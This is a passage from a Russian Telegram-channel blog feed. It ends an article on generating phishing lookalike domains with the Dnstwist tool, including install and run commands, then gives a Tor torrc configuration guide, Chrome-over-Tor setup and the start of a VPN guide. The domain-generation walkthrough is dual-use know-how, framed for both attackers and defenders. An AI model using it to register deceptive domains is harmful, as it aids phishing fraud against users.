  &lt;p&gt;Определенные буквы просто удаляются из названия домена. К нашему удивлению, все имена доменов Instagram были определены как доступные. Возвращаясь к примеру бит-сквоттинга выше — наверняка кто-то может заметить, что первая или последняя буква в имени домена отсутствует, но заметить пропущенную букву в середине слова — значительно сложнее.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-4.jpg&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;5. Поддомен&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Речь идет о точке, вставленной в разные позиции в конкретном доменном имени (например, goo.gl — сервис сокращенных ссылок Google). Если взять в качестве примера Gizmodo, то мы увидим, что домены «odo.com» и «zmodo.com» доступны для регистрации. Здесь речь идет только о том, что для создания эффективного фишингового домена достаточно создать убедительно выглядящий поддомен. Подобно «добавлению», этот способ может быть более очевиден пользователю, чем другие трюки.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-1-1.jpg&quot; width=&quot;682&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;6. Подмена гласных&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Гласные буквы в конкретном домене меняются на другие гласные. При беглом взгляде многие из этих доменов, скорее всего, обманут большинство жертв и вынудят их кликнуть по поддельной ссылке. Опять же, это работает, поскольку большинство людей сканируют слова, используя первую и последнюю букву, а не прочитывают каждую букву в слове. Если заменяемая гласная будет на первом или последнем месте, то такой вариант, скорее всего не сработает.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-2-1.jpg&quot; width=&quot;843&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь, после того, как вы узнали те способы, которые Dnstwist может использовать для генерации и проверки доступных фишинговых доменов, давайте посмотрим, как использовать это на практике.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Шаг 1. Установка Dnstwist&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;У Dnstwist есть несколько зависимостей, которые можно установить в Kali Linux, введя команду в терминал:&lt;/p&gt;
  &lt;pre&gt;apt-get install python-dnspython python-geoip python-whois python-requests python-ssdeep python-cffi
&lt;/pre&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-3-1.jpg&quot; width=&quot;972&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь клонируйте репозиторий Dnstwist с GitHub.&lt;/p&gt;
  &lt;pre&gt;git clone https://github.com/elceef/dnstwist
&lt;/pre&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-4-1.jpg&quot; width=&quot;902&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;И, наконец, используйте команду cd, чтобы перейти в только что созданный каталог «dnstwist», а затем используйте команду ниже, чтобы просмотреть доступные параметры.&lt;/p&gt;
  &lt;pre&gt;cd dnstwist /
./dnstwist.py --help
&lt;/pre&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-5.jpg&quot; width=&quot;1084&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;Шаг 2. Генерация фишинговых доменов с помощью Dnstwist&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Чтобы начать генерацию фишинговых доменов с помощью Dnstwist, используйте команду ниже. В нашей команде используется несколько аргументов, расшифровка каждого из них дается под скриншотом.&lt;/p&gt;
  &lt;pre&gt;./dnstwist.py --ssdeep --json --threads 40 website.com&amp;gt; website.com.json
&lt;/pre&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/easily-generate-hundreds-phishing-domains.w1456-6.jpg&quot; width=&quot;965&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Аргумент —ssdeep указывает Dnstwist анализировать HTML-код каждого домена и сравнивать его с HTML-кодом реального веб-сайта. Уровень сходства будет выражаться в процентах. Однако каждый веб-сайт нужно проверять вручную независимо от процентного уровня, выданного Dnstwist. Эти проценты необходимы для того, чтобы помочь специалистам по безопасности определить, какие домены, скорее всего, являются фишинговыми доменами.&lt;/li&gt;
    &lt;li&gt;Dnstwist поддерживает два выходных формата, которые могут использоваться с другими приложениями. Формат вывода —json использовался в нашем примере выше, но также поддерживается вывод в CSV, который может быть включен с использованием аргумента —csv вместо формата JSON. Чтобы сохранить любой формат в файл, можно использовать закрывающую угловую скобку и имя файла (&amp;gt; имя_файла), чтобы записать данные в указанный файл.&lt;/li&gt;
    &lt;li&gt;По умолчанию Dnstwist будет делать 10 запросов при проверке доступных фишинговых доменов по своему списку. Это число можно увеличить или уменьшить, используя аргумент —threads и указав нужное значение.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;В нижней части терминала Dnstwist будет отображаться прогресс-бар. В зависимости от скорости сети и количества потоков этот процесс может занять несколько минут.&lt;/p&gt;
  &lt;p&gt;Всегда уделяйте особое внимание доменным именам&lt;/p&gt;
  &lt;p&gt;Как для хакера, готовящегося к фишинговой атаке, так и для системного администратора, защищающегося от таких атак, Dnstwist — это фантастический инструмент, используемый для выявления жизнеспособных доменов, которые могут быть использованы в противоправных целях. У Dnstwist несколько ключевых преимуществ по сравнению с аналогичными инструментами, такие как возможность анализа и сравнения HTML-кода потенциальных фишинговых-доменов, поддержка различных форматов вывода и широкий спектр генерируемых фишинговых доменов.&lt;/p&gt;
  &lt;p&gt;Если вы обычный пользователь, посещающий какой-нибудь веб-сайт, обращайте особое внимание на URL-адрес сайта, когда вы на него переходите. И хотя гомоглифы обнаружить трудно, остальные схемы заметить сравнительно легко, если вы потратите чуть больше времени, чтобы изучить их.&lt;/p&gt;
  &lt;p&gt;Надеемся, что вам понравилась эта статья о генерации и обнаружении фишинговых доменов с помощью Dnstwist. Если у вас есть вопросы или комментарии — оставляйте их ниже.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:HyJjr4fFE</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/HyJjr4fFE?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Учимся работать с Tor. Настройка Tor. Настройка Google Chrome через сеть TOR</title><published>2019-04-03T13:31:02.590Z</published><updated>2019-04-03T13:31:02.590Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/ac/acbe8015-cbbe-48e6-8685-8e1f8edc4212.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/e4/e4cf6b6c-59e8-44ae-92a7-96addfb59611.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e4/e4cf6b6c-59e8-44ae-92a7-96addfb59611.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Конфигурационный файл — обычный текстовый файл. Он носит имя &lt;strong&gt;torrc&lt;/strong&gt; (без расширения) и находится:&lt;/p&gt;
  &lt;p&gt;— при использовании сборки Tor Browser — в каталоге ..\&amp;lt;Каталог Tor Browser&amp;gt;\Data\Tor&lt;/p&gt;
  &lt;p&gt;— в инсталлированных пакетах — &amp;lt;Documents and Settings\&amp;lt;пользователь&amp;gt;\Application Data\Vidalia&lt;/p&gt;
  &lt;p&gt;— в ОС Ubuntu Linux — в каталоге /etc/tor&lt;/p&gt;
  &lt;p&gt;Программа Tor при загрузке (перезагрузке) первым делом считывает конфигурационный файл и устанавливает рабочие параметры в соответствии со значениями команд в файле &lt;strong&gt;torrc&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Редактирование файла torrc можно производить в простейшем текстовом редакторе: Блокнот, AkePad и т. д. Желательно перед правкой сохранить первоначальный файл torrc в той же папке. Например, прибавив к имени расширение *.bak, *.001 и т. д.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Чтобы изменения вступили в силу нужно перезагрузить всё ПО системы Tor!&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Фиксирование выходного или входного узла сети Tor&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Напомним, что выходные сервера в Tor постоянно меняются случайным образом. Для пользователя это означает, что его IP не стабилен. С точки зрения посещаемого ресурса пользователь в любой момент может превратиться из француза, скажем, в японца, или ещё кого хуже. При работе с сайтами, фиксирующими сессию пользователя, такой вариант совершенно неприемлем.&lt;/p&gt;
  &lt;p&gt;Есть возможность прямо указывать, какой сервер (нод) должен быть выходным. IP в этом случае будет постоянным. Для этого в &lt;strong&gt;torrc&lt;/strong&gt; дописываем две строчки:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ExitNodes &amp;lt;имя узла&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;StrictExitNodes 1&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Где:&lt;/p&gt;
  &lt;p&gt;Переменная ExitNodes – указывает использовать определённый сервер в качестве выходного узла&lt;/p&gt;
  &lt;p&gt;StrictExitNodes 1 – указание в случае недоступности выбранного сервера не пытаться подключиться к другому, а выводить ошибку.&lt;/p&gt;
  &lt;p&gt;Допускается записывать &lt;strong&gt;несколько узлов&lt;/strong&gt; через запятую или, например, указав &lt;strong&gt;ExitNodes {de}&lt;/strong&gt; — получим только немецкие сервера в качестве выходных. («Закосим» под немца!)&lt;/p&gt;
  &lt;p&gt;Аналогично фиксируется и входной узел:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;EntryNodes &amp;lt;имя узла&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;StrictEntryNodes 1&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Есть ещё одна полезная настройка из этой серии — &lt;strong&gt;TrackHostExits&lt;/strong&gt; фиксирует выходной узел (host) для заданных доменов, что позволяет сохранять сессию для тех серверов, которые проверяют IP клиентов. Синтаксис записи такой:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;TrackHostExits host,.domain,…&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Исключение подозрительных узлов&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для исключения не вызывающих доверия узлов (Например — российских, украинских и белорусских) нужно добавить в &lt;strong&gt;torrc&lt;/strong&gt; строку:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ExcludeNodes {ru}, {ua}, {by}&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Или можно указать конкретный список имён.&lt;/p&gt;
  &lt;p&gt;Теперь если пытливые ребята с серенькими глазками в РФ, УА или РБ додумаются сделать подставной Tor-сервер и попытаются прослушивать выходные данные, то мы никак не сможем попасть на такой сервер.&lt;/p&gt;
  &lt;p&gt;Есть полезное свойство файла &lt;strong&gt;torrc&lt;/strong&gt;. Это комментарий. Tor не выполняет строки в файле torrc если строка начинается с символа «#». Благодаря комментариям вы можете хранить в файле &lt;strong&gt;torrc&lt;/strong&gt; заготовки, и при необходимости быстро включать их, убрав «#».&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Прописывание прокси-сервера в Tor&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Добавить следующие строки в конец конфигурационного файла Tor с заменой &amp;lt;адрес прокси&amp;gt; и &amp;lt;номер порта&amp;gt; (а также &amp;lt;логин&amp;gt; и &amp;lt;пароль&amp;gt;, если они есть) на конкретные значения прописываемого http или https прокси-сервера.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# Force Tor to make all HTTP directory requests through this host:port (or&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# host:80 if port is not set).&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;HttpProxy &amp;lt;адрес прокси&amp;gt;:&amp;lt;номер порта&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# A username:password pair to be used with HTTPProxy.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;HttpProxyAuthenticator &amp;lt;логин&amp;gt;:&amp;lt;пароль&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# Force Tor to make all TLS (SSL) connectinos through this host:port (or&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# host:80 if port is not set).&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;HttpsProxy &amp;lt;адрес прокси&amp;gt;:&amp;lt;номер порта&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;# A username:password pair to be used with HTTPSProxy.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;HttpsProxyAuthenticator &amp;lt;логин&amp;gt;:&amp;lt;пароль&amp;gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;После правки и сохранения файла &lt;strong&gt;torrc&lt;/strong&gt; необходимо перезапустить Tor.&lt;/p&gt;
  &lt;p&gt;Для проверки настроек можно использовать графическую оболочку Vidalia или Tor-анализатор (зайти на &lt;a href=&quot;https://helpugroup.ru/goto/http://check.torproject.org&quot; target=&quot;_blank&quot;&gt;check.torproject.org&lt;/a&gt;).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Список некоторых команд (настроек) Tor&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;EntryNodes nickname, nickname …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список серверов, которые предпочтительно использовать в качестве «входных» для установления TCP/IP-соединения с узловой цепочкой маршрутизаторов Tor, если это возможно.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ExitNodes nickname,nickname …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список серверов, которым предпочтительно отводить роль замыкающего звена в узловой цепочке маршрутизаторов Tor, если это возможно.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;ExcludeNodes nickname,nickname …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список узлов, которые вовсе не следует использовать при построении узловой цепочки.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;StrictExitNodes 0|1&lt;/strong&gt;Если установлено в 1, Tor не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке выходных узлов в качестве посредников, устанавливающих соединение с целевым хостом и, соответственно, являющихся своеобразным замыкающим звеном в цепочке узлов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;StrictEntryNodes 0|1&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Если данному параметру присвоено значение 1, Tor не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке входных узлов для подключения к сети Tor.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;FascistFirewall 0|1&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Если данному параметру присвоено значение 1, Tor при создании соединения будет обращаться исключительно на Луковые Маршрутизаторы, у которых для осуществления подключения открыты строго определённые номера портов, с коими позволяет устанавливать соединение Ваш файрволл (по умолчанию: 80-й (http), 443-й (https), см. FirewallPorts). Это позволит Tor, запущенному на вашей системе, работать в качестве клиента за файрволлом, имеющим жёсткие ограничительные политики. Обратное утверждение неверно, поскольку в этом случае Tor не сможет исполнять обязанности сервера, закрытого таким файрволлом.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;FirewallPorts ПОРТЫ&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список портов, к которым Ваш файрволл позволяет подсоединяться. Используется только при установленном значении параметра FascistFirewall. (По умолчанию: 80, 443) (Default: 80, 443)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;LongLivedPorts ПОРТЫ&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список портов для сервисов, которые имеют склонность устанавливать особо длительные соединения (к ним относятся преимущественно чаты, а также интерактивные оболочки) Узловые цепочки из маршрутизаторов Tor, которые используют эти порты, будут содержать только узлы c наиболее высоким аптаймом (характерным временем присутствия в сети), с целью уменьшения вероятности отключения узлового сервера от сети Tor до закрытия потока. (По умолчанию: 21, 22, 706, 1863, 5050, 5190, 5222, 5223, 6667, 8300, 8888).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;MapAddress адрес:новый_адрес&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Когда к Tor придёт запрос на указанный адрес, луковый маршрутизатор изменит адрес перед тем, как приступить к обработке запроса. Например, если вы хотите, чтобы при соединении с www.indymedia.org была использована цепочка узлов Tor с выходом через torserver (где torserver – это псевдоним сервера), используйте «MapAddress www.indymedia.org www.indymedia.org.torserver.exit».&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;NewCircuitPeriod ЧИСЛО&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Каждые ЧИСЛО секунд анализировать состояние соединения и принимать решение о том, нужно ли иницииро��ать построение новой узловой цепочки. (По умолчанию: 30 секунд)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;MaxCircuitDirtiness ЧИСЛО&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Разрешить повторное использование цепочки, в первый раз собранная в определённом составе своих звеньев — самое большее — ЧИСЛО секунд назад, но никогда не присоединять новый поток к цепочке, которая обслуживала данный сеанс в течение достаточно продолжительного времени. (По умолчанию: 10 минут)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;NodeFamily псевдоним, псевдоним …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Именованные сервера Tor (закономерным образом, для повышения степени прозрачности иерархии сети Tor) объединяются в «семейства» по признаку общего или совместного администрирования, так что следует избегать использования любых 2-х из таких узлов, «связанных родственными узами», в одной и той же цепочке анонимных маршрутизаторов Tor. Специальное задание опции NodeFamily может понадобиться только тогда, когда сервер с данным псевдонимом сам не сообщает о том, к какому «семейству» он себя причисляет, что на стороне сервера OR должно быть продекларировано путём указания параметра MyFamily в файле torrc. Допускаются множественные указания этой опции.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;RendNodes псевдоним, псевдоним …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список узлов, которые по возможности желательно использовать в качестве точек рандеву (встречи).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;RendExcludeNodes псевдоним,псевдоним …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Список узлов, которые ни в коем случае не следует использовать при выборе точек рандеву (точек встречи).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;SOCKSPort ПОРТ&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Известить Tor о том, что на этом порту должны прослушиваться соединения, устанавливаемые приложениями, использующими SOCKS-протокол. Обнулите этот параметр, если Вам вовсе ни к чему, чтобы приложения устанавливали соединения по SOCKS-протоколу посредством Tor. (Значение по умолчанию: 9050)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;SOCKSBindAddress IP[:ПОРТ]&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Установить привязку к данному адресу для прослушивания запросов на соединение от приложений, взаимодействующих по SOCKS-протоколу. (По умолчанию: 127.0.0.1). Также Вы можете указать порт (например, 192.168.0.1:9100), который, разумеется, на целевой машине должен быть «открыт» посредством соотв. настройки файерволла. Определение этой опции может быть повторено многократно для осуществления одновременной («параллельной») привязки ко множеству различных адресов/портов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;SOCKSPolicy политика,политика …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Задаёт политики входа на данный сервер с целью ограничения круга клиентских машин, которым разрешено подключаться к SOCKS порту. Описание этих политик вводится аналогично тому, как это делается для политик выхода (см. ниже).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;TrackHostExits хост,.домен …&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для каждого из значений в разделённом запятыми списке, Tor проследит недавние соединения для хостов, соответствующих этому значению и попытается использовать один и тот же выходной (замыкающий) узел для каждого из них. Если очередной элемент списка предваряется символом «.», то его значение будет трактоваться, как соответствующее домену в целом. Если один из элементов списка состоит из одной только «точки», то это указывает на его «универсальное» соответствие всем путевым именам. Эта опция может оказаться полезной, если Вы часто устанавливаете соединение с серверами, которые аннулируют все записи о пройденной Вами аутентификации (т.е. принуждают выйти и зарегистрироваться снова) при осуществлении попытки переадресации TCP/IP-соединения, установленного с одним из таких серверов, на Ваш новый IP-адрес после его очередной смены. Обратите особое внимание на то, что использование этой опции невыгодно для Вас тем, что это позволяет серверу напрямую ассоциировать историю соединений, запрашиваемых определённым IP, с Вашей пользовательской учётной записью. Хотя в принципе, если кому-то и понадобится собрать всю информацию о Вашем пребывании на сервере, желающие в любом случае смогут сделать это посредством cookies или других специфичных для используемого протокола обмена средств.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;TrackHostExitsExpire ЧИСЛО&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Поскольку серверы, являющиеся выходными звеньями узловой цепочки, имеют право начинать работу и завершать её по собственному усмотрению, т.е. так или иначе – произвольным, случайным образом, желательно, чтобы ассоциация между хостом и выходным узлом автоматически потеряла свою силу по истечении некоторого ЧИСЛА секунд полного отсутствия сетевой активности со стороны сервера. По умолчанию – 1800 секунд (30 минут).&lt;/p&gt;
  &lt;p&gt;Существующий набор команд Tor достаточно велик. Рассмотрение их всех выходит за рамки настоящего обозрения. Здесь были приведены лишь несколько наиболее типичных вариантов редактирования и лишь часть команд. Полный список и синтаксис команд (на английском языке) можно найти на сайте разработчиков Tor.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Настройка Google Chrome через сеть TOR&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Действия в Торе&lt;/strong&gt; (нам только нужно посмотреть его настройки):&lt;/p&gt;
  &lt;p&gt;1. Первым делом скачаем и запустим последнюю версию Тор браузера 3.5. При первом включении нажимаем соединиться, если у Вас нет особых настоек Интернета которые нужно ввести.&lt;/p&gt;
  &lt;p&gt;2. Заходим в &lt;strong&gt;“Настройки”&lt;/strong&gt; Тора на панели задач. &lt;strong&gt;“Дополнительные”&lt;/strong&gt;, &lt;strong&gt;“Сеть”&lt;/strong&gt;. Под Сетью нажимаем в пункте Соединение вкладку “&lt;strong&gt;Настроить…”&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;3. Ничего не меняем, записываем или запоминаем настройки указанные на &lt;strong&gt;“Узел SOCKS”&lt;/strong&gt;. В последней версии у меня на данный момент это &lt;strong&gt;127.0.0.1 : 9150&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Действия в хроме:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;1. На панели заходим в &lt;strong&gt;“Настройки”&lt;/strong&gt;. Прокручиваем полностью вниз и нажимаем &lt;strong&gt;“Показать дополнительные настройки”&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;2. Находим вкладку Сеть, нажимаем &lt;strong&gt;“Изменить настройки прокси сервера”&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;3. В появившимся окне, во вкладе Подключения, внизу нажимаем&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Настройка LAN&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;В настройках локальной сети ставим галки (лишние убираем если стоят):&lt;/p&gt;
  &lt;p&gt;“Автоматическое определение параметров”&lt;/p&gt;
  &lt;p&gt;Использовать прокси сервер для подключений LAN&lt;/p&gt;
  &lt;p&gt;Нажимаем кнопку &lt;strong&gt;“Дополнительно”&lt;/strong&gt;:&lt;/p&gt;
  &lt;p&gt;В пятом пункте &lt;strong&gt;Socks&lt;/strong&gt; вводим:&lt;/p&gt;
  &lt;p&gt;Адрес прокси сервера &lt;strong&gt;127.0.0.1&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Порт &lt;strong&gt;9150&lt;/strong&gt; (порт должен совпадать с портом в настройках вашего TOR).&lt;/p&gt;
  &lt;p&gt;В других строках оставляем все пустым. Галку “Один прокси на все” НЕ ставим.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Проверка результата:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для проверки перейдите на сайт проверки IP: whoer.net (не реклама) или другой сайт проверки IP.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Советы:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для удобного и быстрого серфинга в Интернете отключите загрузку картинок и Java script в Хроме. В этом случае скорость загрузки становиться ощутимо быстрой и не раздражающей.&lt;/p&gt;
  &lt;p&gt;Для страниц, на которых картинки и Java нужны, их можно подгрузить, включив их для Данной страницы в правом верхнем углу в конце адресной строки Хрома и перезагрузив страницу.&lt;/p&gt;
  &lt;p&gt;При этом не надо каждый раз лезть в настройки! Удобно и быстро. В лисе такого нет.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Google Chrome через ТОР работает только при включенном ТОРе.&lt;/strong&gt; Без Тора страницы загружаться с этими настройками не будут.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:BJoLC9JFN</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/BJoLC9JFN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Учимся поднимать собственный VPN на сервере</title><published>2019-04-01T14:21:07.392Z</published><updated>2019-04-01T14:21:07.392Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/ac/acbe8015-cbbe-48e6-8685-8e1f8edc4212.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/e4/e4cf6b6c-59e8-44ae-92a7-96addfb59611.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e4/e4cf6b6c-59e8-44ae-92a7-96addfb59611.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Зачем нужен VPN&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;VPN обычно используют разные предприятия и организации, что бы объединить разные её филиалы или удаленных пользователей, которые находятся физически далеко друг от друга, в одну сеть. Но нам интересно не это.&lt;/p&gt;
  &lt;p&gt;VPN позволяет выходить в сеть от пользователя с другим IP адресом, возможно, другой страны, что дает возможность обходить разного рода блокировки или воспользоваться ресурсами, которые доступны только для пользователей определенных стран (допустим существует сайт, который доступен только для пользователей Германии).&lt;/p&gt;
  &lt;p&gt;Также, если ваш провайдер не предоставляет вам статический IP адрес, VPN может быть использован для создания такого выделенного IP.&lt;/p&gt;
  &lt;p&gt;Для нас VPN является отличным средством анонимизации и защиты нашего трафика от провайдера.&lt;/p&gt;
  &lt;p&gt;VPN будет скрывать от вашего провайдера ресурсы, которые вы посещаете. А от ресурсов, которые вы посещаете, VPN будет скрывать ваш реальный IP адрес.&lt;/p&gt;
  &lt;p&gt;VPN часто используется как средство для сокрытия Tor-траффика от вашего провайдера, ведь запуская VPN, а затем Tor Браузер, ваш трафик имеет цепь VPN -&amp;gt; Tor, что означает, что факт использования Tor скрыт от провайдера, в ваш настоящий IP адрес не палится перед первой (входной) нодой сети Tor.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;VPN протоколы&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Существует множество разных протоколов VPN.&lt;/p&gt;
  &lt;p&gt;OpenVPN — это протокол с открытым исходным кодом, использующий библиотеку OpenSSL — поддерживает большое количество шифров, очень безопасный, достаточно гибкий в настройке, может работать на любом порту, быстрый по скорости. Для работы необходимо стороннее ПО (клиенты OpenVPN под разные ОС, об этом ниже). Клиентский файл .ovpn может использоваться на любой ОС, в том числе и мобильных. Везде рекомендую вам именно OpenVPN.&lt;/p&gt;
